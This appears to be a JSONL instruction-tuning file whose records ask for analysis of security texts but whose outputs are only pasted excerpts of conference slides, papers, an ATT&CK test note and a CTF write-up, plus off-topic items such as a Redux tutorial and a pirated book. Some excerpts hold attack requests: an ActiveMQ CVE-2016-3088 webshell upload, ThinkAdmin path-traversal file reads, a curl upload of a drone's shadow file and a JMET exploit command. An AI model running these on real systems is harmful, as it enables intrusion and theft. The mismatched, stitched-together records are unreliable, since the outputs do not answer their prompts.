{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Summary * [前言](README.md) * [Preface](README_EN.md) * [目录](Content/Contents.md) * [第一章生](Content/Contents.md) * [1-10课](Content/1-10.md) * [第一课windows提权-快速查找exp](Chapter1/1_windows提权-快速查找exp.md) * [第二课Linux提权-依赖exp篇](Chapter1/2_Linux提权-依赖exp篇.md) * [第三课Delphi代码审计--项目实战1](Chapter1/3_Delphi代码审计--项目实战1.md) * [第四课Asp代码审计--项目实战2](Chapter1/4_Asp代码审计--项目实战2.md) * [第五课工具介绍-Sqlmap](Chapter1/5_工具介绍-Sqlmap.md) * [第六课反攻的一次溯源--项目实战3](Chapter1/6_反攻的一次溯源--项目实战3.md) * [第七课sql server 常用操作远程桌面语句](Chapter1/7_sqlServer常用操作远程桌面语句.md) * [第八课模拟诉求任务攻击](Chapter1/8_模拟诉求任务攻击.md) * [第九课工具介绍-the-backdoor-factory](Chapter1/9_工具介绍-the-backdoor-factory.md) * [第十课msfvenom常用生成payload命令](Chapter1/10_msfvenom常用生成payload命令.md) * [11-20课](Content/11-20.md) * [第十一课工具介绍Veil-Evasion](Chapter1/11_工具介绍Veil-Evasion.md) * [第十二课基于UDP发现内网存活主机](Chapter1/12_基于UDP发现内网存活主机.md) * [第十三课基于ARP发现内网存活主机](Chapter1/13_基于ARP发现内网存活主机.md) * [第十四课基于第十课补充payload1](Chapter1/14_基于第十课补充payload1.md) * [第十五课基于第十课补充payload2](Chapter1/15_基于第十课补充payload2.md) * [第十六课红蓝对抗渗透测试1](Chapter1/16_红蓝对抗渗透测试1.md) * [第十七课红蓝对抗渗透测试2](Chapter1/17_红蓝对抗渗透测试2.md) * [第十八课红蓝对抗渗透测试3](Chapter1/18_红蓝对抗渗透测试3.md) * [第十九课基于netbios发现内网存活主机](Chapter1/19_基于netbios发现内网存活主机.md) * [第二十课基于snmp发现内网存活主机](Chapter1/20_基于snmp发现内网存活主机.md) * [21-30课](Content/21-30.md) * [第二十一课基于ICMP发现内网存活主机](Chapter1/21-30/21_基于ICMP发现内网存活主机.md) * [第二十二课基于SMB发现内网存活主机](Chapter1/21-30/22_基于SMB发现内网存活主机.md) * [第二十三课基于MSF发现内网存活主机第一季](Chapter1/21-30/23_基于MSF发现内网存活主机第一季.md) * [第二十四课基于MSF发现内网存活主机第二季](Chapter1/21-30/24_基于MSF发现内网存活主机第二季.md) * [第二十五课基于MSF发现内网存活主机第三季 ](Chapter1/21-30/25_基于MSF发现内网存活主机第三季.md) * [第二十六课基于MSF发现内网存活主机第四季](Chapter1/21-30/26_基于MSF发现内网存活主机第四季.md) * [第二十七课基于MSF发现内网存活主机第五季 ](Chapter1/21-30/27_基于MSF发现内网存活主机第五季.md) * [第二十八课基于MSF发现内网存活主机第六季](Chapter1/21-30/28_基于MSF发现内网存活主机第六季.md) * [第二十九课发现目标WEB程序敏感目录第一季](Chapter1/21-30/29_发现目标WEB程序敏感目录第一季.md) * [第三十课解决msfvenom命令自动补全](Chapter1/21-30/30_解决msfvenom命令自动补全.md) * [31-40课](Content/31-40.md) * [第三十一课msf的前生今世](Chapter1/31_msf的前生今世.md) * [第三十二", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 DEFCON 28 08-082020 DEFCON 28 Whispers Among the Stars Perpetrating (and Preventing) Satellite Eavesdropping Attacks James Pavur, DPhil Student Oxford University, Department of Computer Science Perpetrating (and Preventing) Satellite Eavesdropping Attacks James Pavur, DPhil Student Oxford University, Department of Computer Science 2 DEFCON 28 08-082020 3 DEFCON 28 08-082020 4 DEFCON 28 08-082020 5 DEFCON 28 08-082020 Bio / Contributors  PhD Student @ Oxford University, Systems Security Lab  Title of (blank) thesis_draft.tex file: Securing New Space: On Satellite Cybersecurity  Dont Work Alone  Daniel Moser, armasuisse / ETH Zürich  Martin Strohmeier, armasuisse / Oxford University  Vincent Lenders, armasuisse  Ivan Martinovic, Oxford University 6 DEFCON 28 08-082020 Lessons from the Past Ruhr-University Bochum, 2005 Black Hat DC, 2009 Black Hat DC, 2010 7 DEFCON 28 08-082020 3 Domain- Focused Experiments 18 GEO Satellites Coverage Area ~100 million km2 8 DEFCON 28 08-082020 Whose Data? 9 FORTUNE GLOBAL 500 MEMBERS 6 OF 10 LARGEST AIRLINES ~40% MARITIME CARGO MARKET GOVERNMENTAL AGENCIES YOU? 9 DEFCON 28 08-082020 Photo: Three Crew Members Capture Intelsat VI, NASA, 1992, Public Domain 3-Minute SATCOM Crash Course 10 DEFCON 28 08-082020 #BHUSA @BLACKHATEVENTS 11 DEFCON 28 08-082020 #BHUSA @BLACKHATEVENTS 12 DEFCON 28 08-082020 #BHUSA @BLACKHATEVENTS 13 DEFCON 28 08-082020 #BHUSA @BLACKHATEVENTS 14 DEFCON 28 08-082020 #BHUSA @BLACKHATEVENTS 15 DEFCON 28 08-082020 16 DEFCON 28 08-082020 17 DEFCON 28 08-082020 18 DEFCON 28 08-082020 19 DEFCON 28 08-082020 20 DEFCON 28 08-082020 Threat Model 21 DEFCON 28 08-082020 Nation-State Actor Tech Photo: Het grondstation van de NSO, Wutsje, July 2012, Wikimedia Commons, CC BY-SA 3.0 22 DEFCON 28 08-082020 Nation-State Actor Tech Photo: Het grondstation van de NSO, Wutsje, July 2012, Wikimedia Commons, CC BY-SA 3.0 23 DEFCON 28 08-082020 $300 of TV Equipment Selfsat H30D ~$90 (or any satellite dish + LNB) TBS-6983/6903 ~$200-300 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTwitter: @Kevin2600  Github: https://github.com/kevin2600  狗汪汪系列: 玩转无线电-不安全的蓝牙锁; 玩转嵌入式-I2C 协议分析; 玩转嵌入式-WINKHUB 边信道; 玩转无线电-GPS Hacking; 玩转无线电-温哥华天车 RFID 票务系统 ... 议程:  无人机攻防那点事  无人机攻防案例篇  无人机攻防实战篇  无人机攻防科幻篇 无人机攻防那点事 无人机世界百家齐放  无人机厂商众多 (DJI; Parrot; Xiaomi; DIYer...)  无人机运用场景广泛 (航拍; 运输; 求婚; 应急反应...)  无人机遥控种类繁多 (RF; WIFI; XBEE; 开源 & 私有协议...) 无人机侵犯隐私 ? 无人机走私犯罪 ? 无人机攻防现状 ?  DARPA 举行无人机攻防比赛 (禁止使用GPS-欺骗  花样百出的防御方式: 视频; 音频; WIFI; 红外; 无线电 ...  千奇百怪的攻击方式: 老鹰; WI-FI 攻击; 超声波干扰; 电磁波干扰 ... 无人机攻防现状 !  GPS 欺骗攻击效果各异 (DJI 精灵3S 禁飞区 & 启始返航  防御设备价格高昂, 不适合普通民众 (每只老鹰 1年开销 6922 $)  电磁波枪覆盖范围有限, 切断遥控信号后反应各异 (降落; 悬停; 返航 无人机攻防案例篇 无人机安全漏洞  无人机安全漏洞 (捕食者; AR-Drone 2.0; 大疆精灵3S ...)  无人机攻击点 (WIFI; GPS 信号; 固件; 遥控器; 手机APP; 飞控协议; 摄像视频 ...)  无人机安全漏洞类型 (WIFI 空密码; GOT ROOT; 飞控指令无认证; 航拍视频无加密 ...) 案例: Parrot AR Drone 2.0  AR Drone 2.0 提供WIFI 热点 (无口令保护)  研究无人机安全必备 Linux on ARM (SkyJack 劫持; Maldrone 病毒..  默认提供 Telnet Root 访问权限. 通过 Pairing 模式来保证安全 (MAC 地址)  kill KILL pidof program.elf DEMO 案例: DBPOWER U818A-WIFI  U818A 提供WIFI 热点 (无口令保护)  U818A 基于 BusyBox 1.20.2 (潜在其它 BusyBox 隐患?  CVE-2017-3209 (未知 FTP server 允许匿名账号任意文件访问, 照片视频等  curl -T shadow ftp://192.168.0.1:21/etc/jffs2/shadow 案例: Parrot Bebop2  Bebop2 基于 Android 系统. 提供TELNET, FTP, UART Root 访问  当Bebop2 接收到大量WIFI连接请求, 将无法处理请求包并坠机  当Bebop2 接收到超大数据包, Buffer将无法处理超额数据包并坠机 案例: Mavlink 开源协议  适用于接受遥控; GPS; 飞行时速等信息 (AR.Drone; ArduPilot ..)  各地面站(GCS) 可同时操控 255 架无人机 (Intel 的 500 架无人机 Show, 劫持攻击?   Fuzzing 环境配置: SCAPY or KITTY + Test cases (ERROR : Floating point exception  Fuzzing 环境配置: 架设虚拟无人机及虚拟地面站环境 (SITL Simulator; MAVProxy; Wireshark) 案例: DJI 大疆无人机系列  大疆精灵3 无人机易被 GPS 欺骗 (flyforbid.json)  大疆精灵3 遥控器 & 无人机 WIFI Probing (MAC: 60:60:1F)  大疆精灵3 Sniffer: github.com/a232319779/PHANTOM-3-STANDARD  大疆精灵3 RF 劫持 Geekpwn 2015 (315晚会报道的无人机是怎么被劫持的?) 案例: DJI 大疆无人机系列 DEMO 无人机攻防实战篇 目标: CX-10WD  适宜无人机逆向入门 CX-10 系列 (WIFI; RF; 视频图传  遥控操作分为 4 个频道, 工作在频率 2.4Ghz 范围  遥控最远距离为 WIFI 可达 40 米, RF 可达 15 米 (室内飞行 CX-10WD 情报收集  无人机工作频率 (900mhz ? 2.4ghz ? 5.8ghz ?)  无人机采用何种无线模块 (芯片? GFSK ? 数率 ?", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1190-CVE-2020-25540-目录遍历文件读取漏洞 ## 来自ATT&CK的描述 使用软件数据或命令来利用面向Internet的计算机系统或程序中的弱点从而导致意外或无法预期的行为系统的弱点可能是错误故障或设计漏洞这些应用程序通常是网站但是可以包括数据库例如SQL标准服务例如SMB 或SSH以及具有Internet可访问开放的任何其他应用程序例如Web服务器和相关服务根据所利用的缺陷这可能包括利用防御防卫 如果应用程序托管在基于云的基础架构上则对其进行利用可能会导致基础实际应用受到损害这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径 对于网站和数据库OWASP排名前10位和CWE排名前25位突出了最常见的基于Web的漏洞 ## 测试案例 ThinkAdmin6版本存在路径遍历漏洞该漏洞主要是因为api中存在危险函数没有任何过滤攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件 影响范围ThinkAdmin版本小于  2020.08.03.01 ## 检测日志 HTTP ## 测试复现 Burp抓包修改参数 ```yml POST /admin.html?s=admin/api.Update/node HTTP/1.1 Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=4e3eb8bf4d142b8bc21279a7418eea26 Upgrade-Insecure-Requests: 1 Content-Length: 27 Content-Type: application/x-www-form-urlencoded rules=%5b%22%2e%5c%2f%22%5d ``` ## 测试留痕 ### 目录遍历 ```yml POST /admin.html?s=admin/api.Update/node HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 X-Forwarded-For: 8.8.8.8 Connection: keep-alive Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 22 rules=%5B%22.%2F%22%5D ``` ### 文件读取 ```s GET /admin.html?s=admin/api.Update/get/encode/5i6s524v5s6j5y4q1a383c38 HTTP/1.1 Host: 192.168.100.194:8000 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Acce", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Hello Redux ### 环境配置 这里我们使用`create-react-app`快速创建一个 React 应用环境 ``` create-react-app react-redux-demo ``` **装包** 安装我们需要的`redux`包和`react-redux`包 ``` npm i redux react-redux -S ``` ### 调整结构 1. 修改`src`内容在App组建内显示`Hello Word` 2. 在项目文件夹下的`src`中创建两个组件`CommentBox`和`PostBody` 3. 挂载在`App`组件上", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking Cloud Product [ Demon@n0tr00t ] 探索一切攻破一切 [ Hacker@KCon ] 3 About me  Working  on  阿里云-云平台安全  Team  of  n0tr00t  http://www.n0tr00t.com/  ID:  Demon  (微博Demon写Demo)   跨界摇滚乐Coding安全 Part. 01 分类和架构 4 5 云的基础架构  种类繁多 基础服务大同小异每家云厂商还有自己的特色云服务   资源开放 按需付费资源开放对于安全的说法就是可控点变多结界难以把控安全的天秤随时会倾斜  木桶原理 木桶原理被放大致弱点容易成为致命点 6 云产品的通用架构 物理集群 Server Portal 运维管控 实例 虚拟机 用户管理 监控系统 计费系统 资源管理 运维管理 容灾系统 网关系统 逻辑服务 控制器 调度系统 生产系统 存储系统 底层云组件 API 7 云产品的安全基石 - 沙箱SandBox  沙箱的结构决定了产品持久稳固性  avoid  be  root,  use  linux  capability  脚本层容器层用户权限层       -脚本层JSMPHP  disabled  function       -容器层DockerLinux  namespacecgroup       -用户权限隔离最小权限原则 用户权限 容器层 脚本层 Part. 02 隐匿在结界内的隐患 8 9 结界的划分 结界外  控制台portal,  用户可管理产品   API服务通过API访问操作实例方便自动化 管理实例   实例本身如连接虚拟服务 器,redis,mongodb等 暗物质  未知模块如一些额外的存储系统  游离在架构之外的服务结界不明难以发 现 结界内  业务逻辑服务负责业务逻辑处理  调度服务负责调配资源控制链路   生产系统负责生产实例或释放实例等  管控系统用于管理或监控实例  其他因架构而定如还存在一些日志组件 下发任务模块等等 10 过度松耦合导致的隐患  十人传话游戏    多层模块分离安全职责不明 11 攻击中间件服务   开源消息中间件KafkaActiveMQRabbitMQOpenJMS等      分布式服务框架DubbozookeeperTAF  攻击方式     Load  eval  Mbean  via  getMBeansFromURL   http://www.n0tr00t.com/2015/04/16/JMX-RMI-Exploit.html      Java  反序列化漏洞http://blog.nsfocus.net/java-deserialization-vulnerability-overlooked-mass-destruction/      XML实体注入命令注入未授权调用服务 12 Use  Java  Message  Exploitation  Tool  (JMET)   Apache  ActiveMQ   Redhat/Apache  HornetQ   Oracle  OpenMQ   IBM  WebSphereMQ   Pivotal  RabbitMQ   IIT  Software  SwiftMQ   Apache  ActiveMQ  Artemis   Apache  QPID  JMS   Apache  QPID  Client  项目地址https://github.com/matthiaskaiser/jmet  使用方法     >  java  -jar  jmet-0.1.0-all.jar  -Q  event  -I  ActiveMQ  -Y  xterm  127.0.0.1  61616 13 ActiveMQ  CVE-2016-3088 MOVE  /fileserver/shell.txt  HTTP/1.1  Destination:  file:///usr/local/apache-activemq-5.7.0/webapps/shell.jsp  Host:  x.x.x.x  PUT  /fileserver/shell.txt  HTTP/1.1  Host:  x.x.x.x  Content-Length:  16  14 运维管控系统   管理控制实例   部署发布系统   状态监控系统   统一配置管理系统  安全隐患   ACL绕过API未授权调用   通过XSS漏洞打入到管控系统执行任务   开源的管控系统的漏洞huesplunk  cactijekinszabbixzenosselastics", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDeveloping Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment DEFCON 24, August 6th 2016 Benjamin Holland (daedared) ben-holland.com DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Developing Managed Code Rootkits for the Java Runtime Environment DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A $ whoami DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A $ whoami Benjamin Holland (daedared) B.S. in Computer Engineering (2005 - 2010) Wabtec Railway Electronics, Ames Lab, Rockwell Collins B.S. in Computer Science (2010 - 2011) M.S. in Computer Engineering and Information Assurance (2010 - 2012) MITRE Iowa State University Research (2012 - 2015) DARPA Automated Program Analysis for Cybersecurity (APAC) Program PhD in Computer Engineering (2015-????) DARPA Space/Time Analysis for Cybersecurity (STAC) Program DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Background DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Hello World DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Env", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCovert Channels Towards a Qual Project Rachel Greenstadt Harvard University Covert Channels  p.1/21 Overview  About covert channels  Example channel: TCP timestamps  Problems with the example channel  Directions in covert channel research Covert Channels  p.2/21 Whats a Covert Channel?  A channel transfers information in a way that violates a security policy  This comes from military literature  Alternately, consider ... Covert Channels  p.3/21 Alice and Bob in Jail  Alice and Bob plan to escape  But the Warden monitors their messages!  If the warden suspects -> solitary confinement Covert Channels  p.4/21 Isnt that a bit subversive?  Well, yes...  But censorship resistance  And privacy  And freedom  Ok, how do we start? Covert Channels  p.5/21 Threat Modelling: Know Your Warden  Watch traffic over channel Attempt to detect suspicious activity  Close off potential channels through filtering  Allow legitimate communication. Covert Channels  p.6/21 Covert Channel Properties  Undetectability  Plausible (legitimate cover)  Open functionality  Encode the message to match channel statistically  Robustness  Message survive natural/malicious lossiness  Indispensable Covert Channels  p.7/21 Example Channel  My first publication!  joint work with John Giffin, Peter Litwack, Richard Tibbetts  Broken in some ways Covert Channels  p.8/21 Why TCP Timestamps?  TCP ubiquitous - plausibility  Possible to modify the timestamp/delay packets  Slow connection - low order bits random  Encryption produces random bits  Seems simple, encrypt message, hide it in low order bits Covert Channels  p.9/21 Robustness???  Dont get TCP reliability if you use the timestamps!  Bits delivered out of order  Bits dropped randomly  Data acknowledged, not packets, cant get reliability there.  Timestamps must increase  Timestamps are an option, can be replaced/squashed. Covert Channels  p.10/21 How to get reliability?  Divide data into blocks  Use a hash of the headers to tell receiver which bit is in timestamp ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWeak Links in Authentication Chains: A Large-scale Analysis of Email Sender Spoofing Attacks Kaiwen Shen 1,, Chuhan Wang 1, , Minglei Guo 1, Xiaofeng Zheng 1,2,, Chaoyi Lu 1, Baojun Liu 1,, Yuxuan Zhao 4, Shuang Hao 3, Haixin Duan 1,2, Qingfeng Pan 5 and Min Yang 6 1Tsinghua University 2Qi An Xin Technology Research Institute 3University of Texas at Dallas 4North China Institute of Computing Technology 5Coremail Technology Co. Ltd 6Fudan University Abstract As a fundamental communicative service, email is playing an important role in both individual and corporate communica- tions, which also makes it one of the most frequently attack vectors. An emails authenticity is based on an authentication chain involving multiple protocols, roles and services, the inconsistency among which creates security threats. Thus, it depends on the weakest link of the chain, as any failed part can break the whole chain-based defense. This paper systematically analyzes the transmission of an email and identifies a series of new attacks capable of bypass- ing SPF, DKIM, DMARC and user-interface protections. In particular, by conducting a \"cocktail\" joint attack, more real- istic emails can be forged to penetrate the celebrated email services, such as Gmail and Outlook. We conduct a large- scale experiment on 30 popular email services and 23 email clients, and find that all of them are vulnerable to certain types of new attacks. We have duly reported the identified vulner- abilities to the related email service providers, and received positive responses from 11 of them, including Gmail, Yahoo, iCloud and Alibaba. Furthermore, we propose key mitigating measures to defend against the new attacks. Therefore, this work is of great value for identifying email spoofing attacks and improving the email ecosystems overall security. 1 Introduction Email service has been a popular and essential communicative service with abundant individual and corporate information, which makes it a key target of cyber a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTechnical Service Bulletin: FXR-10 Modifying GE/MACOM MASTR-III Group 6 (403 MHz  430 MHz) for Amateur Radio Applications (440  450 MHz) A FluX Research project in several phases Release Date: 08-01-2008 Last Update: v1.4 08-01-2008 By: Matt Krick, K3MK DCFluX@yahoo.com Radio Model #: GE/MACOM MASTR-III Group 6 Repeater or Base, Combination Number SXS Warning: Please be aware that this document is currently a work in progress which may contain several omissions and or typographical errors, continue reading at your own risk. Background: The following LBIs may be helpful: LBI38540D Mastr IIe / III UTILITY PROGRAM LBI38636C Mastr III CONVENIONAL BASE STATION Installation Manual LBI38550A Mastr II / III SITE EQUIPMENT POWER SUPPLY LBI38625A Mastr III EMERGENCY POWER OPTIONS LBI38754A Mastr III RF PACKAGE VHF GROUP 2 (150.8-174 MHz) LBI38637 Mastr III T/R SHELF 19D902839G1 LBI38671N UHF TRANSMITTER SYNTHESIZER 19D902780G3, G6-G10 LBI38672L UHF RECEIVER SYNTHESIZER 19D902781G3, G7, G8, G10, G12 LBI38673J UHF RECEIVER FRONT END MODULE 19D902782G3, G4 & G7 LBI39129B UHF RECEIVER FRONT END MODULE 19D902782G6, G8-G11 LBI38643B 25kHz RECEIVER IF MODULE 19D902783G1 LBI39123 12.5/25KHZ RECEIVER IF MODULE 19D902783G7 LBI38764C EARLY SYSTEM MODULE 19D902590G1, G3, G5 LBI39176 LATE SYSTEM MODULE 19D902590G6 & G7 LBI38752B SWITCHING POWER SUPPLY MODULE 19D902589G2, 19D902961 LBI38674L Mastr III 75-90-110 WATT POWER AMPLIFIERS 19D902797G3 G6-G11 Phase 0: Preparations Make sure the station to be converted is in good working order on its original frequencies before attempting conversion to Amateur Radio use. Note that a Fault light on the Receiver Synthesizer Module may be the result of a missing External Reference Source, or the result of the previous owner attempting to program the radio out of range. Verify in programming software and set source to internal if that is the case. About 90% of the screws in the MASTR-III T/R Frame are Torx T-15. The remaining are Phillips #2 and T-6, T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIs WebAssembly Really Safe? - Wasm VM Escape and RCE Vulnerabilities Have Been Found in New Way Zhao Hai(@h1zhao) #BHUSA @BlackHatEvents #BHUSA @BlackHatEvents Information Classification: General About US TianYu Lab of Cyberpeace Tech Co., Ltd. 天虞实验室 TianYu Lab Lei Li Supervisor Mengchen Yu Manager Zhichen Wang Researcher Hai Zhao Researcher #BHUSA @BlackHatEvents Information Classification: General Agenda  WebAssembly Runtime Introduction  WebAssembly Fuzz Tools Develop  Vulnerabilities Analyse And Exploit Develop  Conclusion #BHUSA @BlackHatEvents Information Classification: General What we focus? - WebAssembly Runtime Previous Researches focus on We are interested in #BHUSA @BlackHatEvents Information Classification: General WebAssembly Runtime Architecture The stack is divided into two parts. Bounds Check BOF? sorry WASI is a system interface. Similar to syscall in c Docker #BHUSA @BlackHatEvents Information Classification: General WebAssembly Runtime Vulnerability Bounds Check I would say WASM standard is really safe, but not its runtime. Maybe vulnerable #BHUSA @BlackHatEvents Information Classification: General WASM Fuzz Develop  Focus on WASM file structureWASI APIbytecode implemention in runtime.  Coverage guide fuzzing. Wasm generator use AFL/libfuzzers output samples as input data, mapping them to wasm files Coverage guide samples do I am coverage guided? #BHUSA @BlackHatEvents Information Classification: General WASM Generator / Structure  Follow wasm format, we develop the wasm generator.  Core idea is to make the Non randomizable fields fixed or calculated, otherwise use the data read from the fuzzers samples. Fixed magic and version Fixed range(0~16) Section ID Calculated Section Len randomizable field  #BHUSA @BlackHatEvents Information Classification: General WASM Generator / Structure Our generator use C++ objects to handle every types of section, every fields of section, this is easy to implement. class Section { public: virtual SectionId id() = 0", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# My Favorite Color Category: Steganography, 50 points ## Description > My favorite color is transparent, what is yours? A blank image was attached. ## Solution The image provided was blank, however using a tool such as [StegOnline](https://stegonline.georgeom.net/) it was possible to view the flag hidden in one of the red planes: `flag{transparent_is_the_new_black}`.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nsee more please visit: https://homeofpdf.com see more please visit: https://homeofpdf.com see more please visit: https://homeofpdf.com 本书用青年与哲人的对话这一故事形式总结了与弗洛伊德荣格并称 为心理 学三大巨头的阿尔弗雷德阿德勒的思想阿德勒心理学 风靡欧美的阿德勒心理学对于人如何能够获得幸福这个哲学问题给出 了极其简 单而又具体的答案了解了足以被称为这个世界上的一个 真理的阿德勒思想之 后你的人生会发生什么变化呢又或者什么 都不会改变吗 来吧让我们与青年一起走进这扇门 KIRAWARERU YUKI by Ichiro Kishimi, Fumitake Koga Copyright  2013 Ichiro Kishimi & Fumitake Koga Simplified Chinese translation copyright  2015 by China Machine Press All rights reserved. Original Japanese language edition published by Diamond, Inc. Simplified Chinese translation rights arranged with Diamond, Inc. through EYA Beijing Representative Office 北京市版权局著作权合同登记图字01-2014-6302号 图书在版编目C1P)数据 被讨厌的勇气自我启发之父阿德勒的哲学课/(曰岸见一郎 日古贺史健 著渠海霞译.一北京机械工业出版社2015.3 ISBN 978-7-111-49548-2 I .①被11.①岸②古③渠III.①人生哲学一通俗读物IV. ①DB821- 49 中国版本图书馆CIP数据核字2015)第046398号 机械工业出版社北京市百万庄大街22号邮政编码100037) 策划编辑廖岩 责任编辑廖岩 责任校对舒莹 责任印制乔宇 保定市中画美凯印刷有限公司印刷 2015年4月第1版第1次印刷 170mmx242mm  14 印张  1 插页 166 千字 标准书号ISBN 978-7-111-49548-2 定价39.80元 凡购本书如有缺页倒页脱页, 电话服务 服务咨询热线010) 88361066 读者购书热线010) 68326294 (010) 88379203 封面无防伪标均为盗版 see more please visit: https://homeofpdf.com 由本社发行部调换 网络服务 机工官网www.cmpbook.com 机工官博weibo.com/cmpl952 教育服务网www. cmpedu. com 金书网www.golden-book.com see more please visit: https://homeofpdf.com 本书的赞誉 它期许我这一年能拥有被讨厌的勇气继续大胆地许下做自己的愿 望并勇敢实现它 曾宝仪 小心检视你的成功是否只是以害怕被他人讨厌而换来的若是如 此那你的成功不幸只代表你为他人活了一辈子 陈文茜 一部振奋人心又好读易懂的心灵作品看完之后你绝对可以为你 无意义的人生增添美丽色彩的意义好书 身心灵作家 张德芬 如果说自卑是人类与世界互动的必然结果那么勇气就是人们在追 寻意义人生中的必然能力它就藏在每个生命体的某个角落期待着特 别的机遇作者以超越心理咨询的方式进行心灵的对话是一本自我 成长和疗愈很有帮助的书 心丝带心理志愿者协会会长国家心理督导师 韦志中 本书的名字被讨厌的勇气承担这种自由和责任需要无畏的 勇气这种勇气是阿德勒心理学的关键词也是我们人生问题的最终 解药 知乎专栏作家 动机在杭州 这本书绝对不是心灵鸡汤而是稍带苦涩但又可治病的良药也 许阅读过程中你会被作者的犀利颠覆三观心生不爽但不爽过后 抬头看窗外满目清凉世界会美好很多 关系心理学家著名心理咨询师 胡慎之 这是一本深入浅出的好书既适合作为大众的自助手册也可以作 为专业人员的临床指南 see more please visit: https://homeofpdf.com 资深心理咨询师香港精神分析学会副主席 张沛超 不死不生对于一个渴望摆脱旧日模式重新生出一个自己的人来 说勇气总是第一位的这个勇气包括不怕试错不怕被黑被死千回 还能重新活过来的力量 心探索杂志执行主编 赵晓梅 这是一剂烈性药它会刺痛你的意识的神经不要抗拒它一口一 口地喝下去在被你所讨厌的勇气当中你会重新理解自己的生活方 式 壹心理创始人 黄伟强 成长意味着独立青年在面对独", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSpeaking with Cryptographic Oracles Daniel unicornFurnace Crowley Application Security Consultant, Trustwave - Spiderlabs The Speaker and the Presentation A quick introduction and a few distinctions Copyright Trustwave 2010 Confidential The Speaker  Daniel Crowley  Web application security d00d  IANAC (I am not a cryptographer) dcrowley@trustwave.com @dan_crowley Copyright Trustwave 2010 Confidential The Presentation Topic  Finding and exploiting:  Encryption Oracles  Decryption Oracles  Padding Oracles  With little to no cryptographic knowledge  More crypto knowledge, more useful attacks NOT the Presentation Topic  The Oracle  We are not being harvested for energy by robot overlords  Maybe  ORACLE  If you Google <any crypto word> oracle its all you find  Google, the Internet Oracle  While awesome, not what were talking about Copyright Trustwave 2010 Confidential NOT the Presentation Topic  Crypto g00r00s like Adi Shamir  While also awesome and totally related, not the topic  New attacks on old crypto  Mistakes are easy enough to make in implementation  How Padding Oracle attacks work  Too much time to explain  Too many good resources Copyright Trustwave 2010 Confidential For the people playing drinking games  APT iPad  APT China, cyber-war  Cloud mobile botnet  Cloud cloud Twilight APT Sun Tzu  RSA HBGary botnet cloud APT  Cyber-war?  LulzSec??? APT China cyberwar weeaboo, cloud mobile LulzSec. Primer on Cryptographic Terms And some basic mistakes Copyright Trustwave 2010 Confidential Very basic terms  Cipher  A system for scrambling and unscrambling data to protect it  Key  A variable used to permute the cipher  Initialization Vector  A second variable used to randomize the cipher  Plaintext  The data in readable form  Ciphertext  The data in unreadable form  Encryption  Turning something you can read into something 